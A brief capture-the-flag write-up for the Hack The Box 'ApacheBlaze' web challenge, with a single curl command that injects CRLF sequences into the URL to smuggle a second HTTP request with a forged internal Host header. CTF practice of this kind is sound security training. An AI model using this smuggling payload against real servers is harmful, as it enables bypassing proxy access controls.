https://app.hackthebox.com/challenges/546

Description

Step into the ApacheBlaze universe, a world of arcade clicky games. Rumor has it that by playing certain games, you have the chance to win a grand prize. However, before you can dive into the fun, you’ll need to crack a puzzle.

Exploitation

curl -X GET "http://94.237.52.43:32237/api/games/click_topia%20HTTP/1.1%0d%0aHost:%20dev.apacheblaze.local%0d%0a%0d%0aGET%20/SMUGGLED"

Summary

ApacheBlaze: identify the broken request handling, prove control, and use it to recover the flag.